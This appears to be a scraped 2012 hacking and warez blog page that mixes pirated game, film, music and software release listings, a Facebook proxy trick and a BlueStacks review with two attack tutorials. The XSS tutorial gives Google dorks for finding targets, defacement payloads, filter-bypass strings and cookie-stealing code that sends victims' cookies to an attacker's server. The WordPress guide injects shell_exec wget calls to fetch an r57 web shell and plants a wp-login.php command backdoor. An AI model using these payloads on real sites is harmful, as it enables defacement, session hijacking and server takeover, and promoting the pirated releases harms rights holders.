NARUTO SHIPUDDEN

NARUTO SHIPUDDEN

BackTrack

BackTrack all in one hacking os...

Galaxy SIII

Galaxy SIII google android...

Windows

windows scripts...

wap script

wap scrip collection..

Tuesday, November 13, 2012

hide your last name in facebook


Hide your last name in facebook

1.Goto Firefox -- Options -- Advanced -- Network -- Settings -- Connection Settings -- And choose manual proxy configuration.

2.Now Tick " Use This Proxy Servers For All Protocols ".

3.Put this proxy and port
Http Proxy : 202.70.136.142
Port : 8080

5) Put 202.70.136.142 on No Proxy for Box.

6) Now goto Account Settings, Delete Middle Name and Last Name. Then Save!

Monday, November 12, 2012

Stronghold HD-TiNYiSO & Stronghold Crusader HD-TiNYiSO


Scene group TiNYiSO released Stronghold HD and Stronghold Crusader HD. Stronghold Crusader HD updates the classic castle building game from Firefly Studios with high definition graphics, allowing generals to view an entire battlefield on a single screen.
Description: Stronghold is a ‘historic real-time strategy (RTS)’ game developed by Firefly Studios, and released October 2001. While the game focuses primarily on conquest and expansion through military pursuits, Stronghold does provide space for economic strategy and development: there is both an economic and a military campaign to be played and both are discussed in the game manual. The game takes place in Medieval Britain around the time of AD 1066, though, since there is sometimes no time limit, scenarios can continue to hundreds of years beyond this date.
As well as earning many favorable reviews from reviewers such as PCGamer and GameSpy (see Reception section), the game continues to boast a large community, who edit and create various material through the in-game Map Editor/Scenario Creator.
Key Features:
  • Join the Crusaders or the Saladin’s forces in 4 historical campaigns
  • Fight through 100 unique skirmishes, each one more challenging than the last
  • Use new units like the Assassin and Mercenary Soldiers
  • Experience classic Stronghold Crusader gameplay in HD and view the entire battlefield on a single screen
  • Flank your enemy without having to take your eyes off your attacking soldiers
Release Names :
Stronghold.HD-TiNYiSO
Stronghold.Crusader.HD-TiNYiSO
Size : 785MB & 868MB


Saturday, November 10, 2012

run any android application on windows (BlueStack)

BlueStacks is an Android app player for Windows that can run any type of Android apps and games in full screen mode without encountering any performance or compatibility related issues. It features 10 pre-loaded apps along with an option to add custom apps. You can either download new apps from the BlueStacks Channel or push your favorite apps from your Android phone to your PC via BlueStacks Cloud Connect.

After installation, you will find a gadget on the right corner of your screen. Clicking the gadget will extend an App Tray.When you run an app, the application will automatically go into full screen mode.

At the bottom, you have Menu, Rotate, Zoom and All Apps buttons in the center with app navigation and close buttons at either side. The Zoom button switches between full-screen and standard view modes. Clicking the All Apps button will show the BlueStacks gadget with the App Tray.

You can download additional Android apps from BlueStacks Channels. Click Get More Apps in the widget app tray. Upon the first visit, you need to login with your Facebook account. Once logged in, you can choose and install an app by clicking the Subscribe button under it.

A great feature of this application is that you can push the apps from your Android device to your PC by using the BlueStacks Cloud Connect option.

Once done, open the Cloud Connect page on your PC’s browser to receive a Phone PIN. Open the app on your phone, enter the PIN and tap OK. You should now be able to see a list of all your apps inside BlueStacks Cloud Connect. Check the app that you want to push to your PC and tap Sync.
You might have to wait for some time for the apps to sync with your PC. When the syncing process is completed, you can run all your Android device’s apps on your PC.
There was a lot of hype surrounding BlueStacks when it was first announced and truth be told, even though it is in alpha stage as of now, the application far exceeds expectations. It runs Android apps with little or no lag at all and provides its own medium for transfer of apps from device to PC. It does have its limitations, though. For instance, you cannot use apps or play games that are dependent on multi-touch – an issue that might be resolved in future updates.
Only the free version of BlueStacks is available at the moment and it has a maximum limit of 26 downloadable apps (excluding the 10 pre-loaded apps). The application works on Windows Vista and Windows 7.


complete tutorial on xss (cross site scripting )

xss security risk
Welcome To another lesson in which i will be covering XSS..

Table Of Contents
What is XSS?
Finding XSS Vulnerabilities
The Basics On XSS
Deface Methods
Cookie Stealing
Filtration Bypassing
___________________
What is XSS?
'XSS' also known as 'CSS' (Cross Site Scripting, Easily confused with 'Cascading Style Sheets')
is a very common vulnerbility found in Web Applications, 'XSS' allows the attacker to INSERT
malicous code,There are many types of XSS there but i will only explain 3 of them and they are most important 
1-'URL XSS' this means that the XSS wont stay on the page it will only get executed if you have the malicous code in the URL and submit the url.

2- Input fields, Where ever you can insert data, it is very common, to be XSS vulnerable, for example say we found a site with a search engine, Now in the search box you enter 'hacker' now hit enter, when the page loads, if it says your data like 'Found 100 Results For hacker' ok now you see its displaying out data on the page, now what if we can exexute code? there is no possible way to execute PHP code in this Attack, but certainly is for HTML, Javascript, but be aware this method.

3-In the Third one  you will be able to INSERT data (code) and it will stay on the website.now there are 2 kinds, it depends if we can execute PHP or HTML if we can inject PHP then we can also  inject HTML but NOT vice versa, Ok this kinda attack is normally found on Blogs, Shoutboxes, Profiles Forums, just most  places where you insert data and it stays there. now HTML is totally different then PHP.HTML downloads to your pc and then your 'Browser' parses/interprets the code, (that's why its source is viewable) With PHP the code is interpreted on the server the script is hosted on, then the data is returned to the browser.For PHP injection its rare, But it don't harm to try. Note: PHP code cant be injected into HTML page!

Finding XSS Vulnerabilities
Well to start finding these vulnerabilities you can start checking out
Blogs, Forums, Shoutboxes, Comment Boxes, Search Box's and many things

Using 'Google Dorks' to make the finding easier, Ok if you wanna get cracking, goto Google.com and type
inurl:"search.php?q=" now that is a common page and has a lot of results, Now lets move on to the next part

The Basics On XSS 


To know the basic this Picture may help you 

The most used Xss injection is 

<script>alert("XSS")</script>

This will alert a popup saying xss if the site is vulnerable and this is easily editable means you can also inject 
<script>alert("your name or message")</script>
So going previous i told you a google dork , search.php?q= 
Well we will use this to check for vulnerabilities

To check if it is vulnerable we type

www.site.com/search.php?q=<script>alert("your name or message")</script>


This then gives a popup like this





 Many at times this works but if it does not work don't cry we have another way.. :P

 You can try injecting HTMl ;)

You can put this two strings to inject html

<h1>anything you want</h1>
<br><br><b><u>any thing you want</u></b>

so our url will be

www.site.com/search.php?q= <h1>anything you want</h1>
or  
www.site.com/search.php?q=<br><br><b><u>any thing you want</u></b>
If you see the bold text on the page and newlines then you knows its vuln 

Example






















Deface Methods 
Well now you understand how XSS works, we can explain some simple XSS deface methods, there
are many ways for defacing i will mention some of the best and most I used,
 
<html><body><IMG SRC="http://site.com/yourDefaceIMAGE.png"></body></html>

the first one being IMG SCR, now for those of you who dont know HTML, IMG SCR is a tag, that
displays the IMAGE linked to it on the webpage.


ok now if u change the link to a valid picture link, and save it and run it you will see your deface page

let us say we have have found a Shoutbox, Comment box, or anything that shows your data after you submitted it you could insert the following to make the picture display on the page.

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

Ok it helps to make your picture big so it stands out and its clear the site got hacked.

Another method is using FLASH videos, its the same has the method below but a little more stylish deface.

<EMBED SRC="http://site.com/xss.swf"

that will execute the flash video linked to it.

Now a popup or a redirection

<script>window.open( "http://hacking-class.blogspot.com" )</script>

 Cookie Stealing

This is the best thing about XSS..

First Get your self a cookie stealer- from here 

ok now you have it save it has a .php file and upload to your server, remember to create the file 'log.txt' too
and chmod it to 777, ok now find a XSS vulnerable website, any attack type will do.

ok now your gona want to insert this code.

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

or

document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
now when user visits the page that got injected too, they will be sent to the site, and cookie will be stolen
the second one is more stealth.

Now it is the time to hijack the cookies



http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
 Filteration Bypassing 


Alot of sites may seem vulnerable but not executing the code..This will help you

Some common methods to bypass filteration is

')alert('xss');

or

");alert('xss');

that will do the same thing has <script>alert("XSS")</script> on a vulnerable server.

You can also try hexing or base64 encoding your data before you submit,

Please note its bad practice to use alert("XSS") to test for XSS, has ive known sites block the keyword XSS 
before.

Some other ways to bypass filteration

<script type=text/javascript>alert("saurav")</script>
<script>alert("saurav")</script>;
<script>alert("saurav");</script>
<script>alert("/saurav"/)</script>

Hope that helped you


How to backd00r and shell a WordPress site

How to backd00r and shell a WordPress site

In this tutorial I will explain how to shell and backd00r a WordPress site.You will need to already have access

to the admin panel of a WordPress site.You can do tis by exploiting vulnerabilities in WordPress plugins like

this one:

http://www.exploit-db.com/exploits/20918/

Shelling the site

Once logged in to the admin panel click on the button labeled Appearance on the side bar, some more buttons

will drop down and it should look like this:

[Image: dIPqS.jpg]

Now select the button labeled 'editor'.Now you can edit the php files which means you can upload your shell.
Open the home page and add this code to it:

Code:
shell_exec('wget http://c99.gen.tr/r57.txt');
shell_exec('mv r57.txt shell.php');

Now goto the index and the shell will be uploaded!Just goto 'http://siteyouhacked/shell.php' and a r57 shell

will be uploaded!

Backd00ring your site

Backd00ring your shelled site is a good idea incase an admin happens to find your shell delete it and then get

rid of the vulnerable plugin.All you have to do is replace the contents of 'wp-login.php' with this:

wp-login.php

Now go to http://siteyouhacked/wp-login.php?run=cat /etc/passwd and it will run that command.

Wednesday, November 7, 2012

Citadel 2012 DVDSCR AC3-2 0 XviD-AXED


null
P2P group AXED released DVDSCR of Citadel (2012), a Drama, Horror, Thriller movie, directed by Ciaran Foy, starring Aneurin Barnard, James Cosmo, Wunmi Mosaku. An agoraphobic father teams up with a renegade priest to save his daughter from the clutches of a gang of twisted feral children. Enjoy!
Plot: Tommy Cowley is a young father inflicted with chronic agoraphobia since his wife was brutally attacked by a gang of a twisted feral children. Trapped in the dilapidated suburbia of Edenstown, he finds himself terrorised by the same gang, who now seem intent on taking his baby daughter. Torn between the help of an understanding nurse and a vigilante priest, Tommy sets out to learn the nightmarish truth surrounding these hooded children. He also discovers that to be free of his fears, he must finally face the demons of his past and enter the one place that he fears the most – the abandoned tower block known as the Citadel.
null
Genre: Drama, Horror, Thriller
IMDB rating: 6.5/10 (from 161 users)
Directed by: Ciaran Foy
Starring: Aneurin Barnard, James Cosmo, Wunmi Mosaku
Release Name: Citadel.2012.DVDSCR.AC3-2.0.XviD-AXED
Size: 700 MB
Quality: XviD, 640 x 360 @ 1 017 Kbps
Audio : English AC-3 128 Kbps
Runtime: 1h 24mn
Links: IMDBTrailerNewTorrents Tinysubs

The Expendables 2 2012 720p BluRay x264-SPARKS

Scene group SPARKS released the 720p BluRay of The Expendables 2, an Action / Thriller movie starring Sylvester Stallone, Liam Hemsworth and Randy Couture, directed by Simon West.
Plot: Barney Ross is approached by CIA man Church, who wants him and his guns for hire to go to the former Soviet Union to retrieve something that was on a plane that crashed. Church doesn’t tell him what he is getting. And Church sends a woman, Maggie with him to make sure he gets it. They find the plane and get the thing but some men take one of Barney’s people hostage and the leader tells him to give him what they got or he’ll kill his hostage. The give it to him but he kills his hostage anyway. Barney asks Maggie what was so important about that thing. She says that it showed the location of a Russian plutonium storage mine. Barney decides to track the man down and deal with him. They track them down and discover that the man they seek is Vilain who leads a group known as The Sangs and that they have taken all the men from the surrounding villages to work the mine.
Genre: Action | Adventure | Thriller
IMDB rating: 7.2/10
Directed by: Simon West
Starring: Sylvester Stallone, Liam Hemsworth and Randy Couture
Release Name: The.Expendables.2.2012.720p.BluRay.x264-SPARKS
Size: 4.36 GB
Quality: 1280×536 | 4496Kbps | 23.976 | DTS
Runtime: 102 mins
Links: iMDB – HOMEPAGE – Trailer – TinySubs
NFO: Here
Torrent: NewTorrents

Sunday, November 4, 2012

phpFox v3.3.0

Lemar – Invincible (iTunes Version)-2012


Description: The fifth studio album from Lemar, Invincible is also recorded on his own new label – AMP. The title track is the first single from the album and was recorded by the singer/songwriter in sessions that took place between London and Los Angeles.
Track List:
1 The First Time
2 Invincible
3 Keep On Luvin’
4 Beautiful
5 Hurricane
6 Merry Go Round
7 Can’t Let Go
8 Into the Night Sky (feat. Shaughnessy)
9 The One Who Saves You
10 Very Best
11 Born to Love
Release Name: Lemar-Invincible_(iTunes_Version)-2012
Genre: Pop
Label: ℗ 2012 (AMP) Angelic Media Limited
Format: m4a
Size: 80.2 MB



Friday, November 2, 2012

Brave 2012 720p BluRay x264-REFiNED

After a few peer2peer releases, now Scene group REFiNED released the 720p BluRay for the #1 animated film of the year “Brave”. I’ve seen it last summer with my little brother and we had a really good time. For those who need them, a subpack comprising English, French and Spanish subtitles is included and size for this release is only 2.6GB. Have a good one.
[Update]: Group REFiNED has released the 1080p blu-ray with a size of 5.5GB.Brave.2012.1080p.BluRay.x264-REFiNED ( NFO –Sample – Subtitles – UPLOADED.net )
Plot: Set in the rugged and mysterious Highlands of Scotland, Disney Pixar’s Brave follows the heroic journey of Merida (voice of Kelly Macdonald), a skilled archer and headstrong daughter of King Fergus (voice of Billy Connolly) and Queen Elinor (voice of Emma Thompson). Determined to change her fate, Merida defies an age-old custom sacred to the unruly and uproarious lords of the land: massive Lord MacGuffin (voice of Kevin McKidd), surly Lord Macintosh (voice of Craig Ferguson) and cantankerous Lord Dingwall (voice of Robbie Coltrane), unleashing chaos in the kingdom. When she turns to an eccentric Witch (voice of Julie Walters), she is granted an ill-fated wish and the ensuing peril forces Merida to harness all of her resources including her mischievous triplet brothers to undo a beastly curse and discover the meaning of true bravery.
Genre: Animation | Action | Adventure | Comedy | Family | Fantasy
IMDB rating: 7.5/10 (41,429 votes)
Metascore: 69/100 (37 Reviews)
Directed by: Mark Andrews, Brenda Chapman, Steve Purcell

Asphalt 7 Heat v1.0.2 iPhone iPad iPod Touch-oNePiEcEPDA


Scene group oNePiEcEPDA released the latest update of Asphalt for iOS. Enjoy!
Description: Hit the speed of heat in the newest, fastest, most visually stunning edition of the famed Asphalt series. A FIRST-CLASS LINEUP Drive: 60 different cars from the world’s most prestigious manufacturers, like Ferrari, Lamborghini and Aston Martin, including the legendary DeLorean. RACE ACROSS THE GLOBE: Gear up to race on 15 tracks set in real cities around the world, including brand new tracks in Hawaii, Paris, London, Miami and Rio. CHALLENGE THE WORLD : The completely revamped multiplayer lets you take on up to 5 of your friends locally or online. Keep track of who’s the best with the new Asphalt Tracker that lets you compare stats, show off achievements and challenge rivals. You can also find new online opponents with the matchmaking system. Practice hard, because there are special events that will pit you against the best in the world!
Features:
  • Drive 60 different cars from the world’s most prestigious manufacturers, like Ferrari, Lamborghini and Aston Martin, including the legendary DeLorean.
  • Gear up to race on 15 tracks set in real cities around the world, including brand new tracks in Hawaii, Paris, London, Miami and Rio.
  • Play however you please with 6 different game modes packed with 15 leagues and 150 different races.
  • Every car and track is more beautiful than ever thanks to graphics that push the limits of your device and the Retina display.
What’s New in Version 1.0.2
  • Optimized for the 4-inch Retina display on iPhone 5

Sony Soundforge Pro Mac v1.0.20 Mac OSX INTEL-DYNAMiCS

Here is a few weeks “older” release of Sony Soundforge Pro for Mac OSX, released by DYNAMiCS group.
Description: Built on a clean slate for OS X, Sound Forge™ Pro Mac provides a contemporary application environment that’s perfect for recording, editing, processing, and rendering broadcast-quality audio master files. A fresh statement on audio editing software, Sound Forge Pro Mac includes a comprehensive suite of mastering, restoration, and repair tools for immediate results. Finally on the Mac, an audio editing application designed exclusively for OS X with a workflow that can keep up with your creative flow. Configurable viewing panels allow you to toggle to any project view you need in seconds — see everything at once or toggle your view to see only the features you want, when you want. Easily navigate the entire interface and work quickly, even on laptops.

Native Instruments Traktor Pro 2 v2.6-UNION + MAC OSX

Scene group UNiON released the lastest update for this well know and popular dj’ing software : TRAKTOR. Enjoy!
Description:
Native Instruments Traktor Scratch Pro is the premium system for pro DJs who want to spin digital tracks on vinyl and CD. Including a full version of the leading Traktor Scratch Pro software, with access to all its features, Mative instruments has set the gold-standard in pro digital vinyl systems. Incredible and precise, the control vinyl and CDs give you ultimate opportunities to mix your set between your own Records, CDs and Computer Audio Files. The high-end AUDIO 8 DJ interface, ingenious Multicore cabling as well as the last word in creative and intuitive software, Traktor Scratch Pro is the definitive fusion of analog and digital DJing.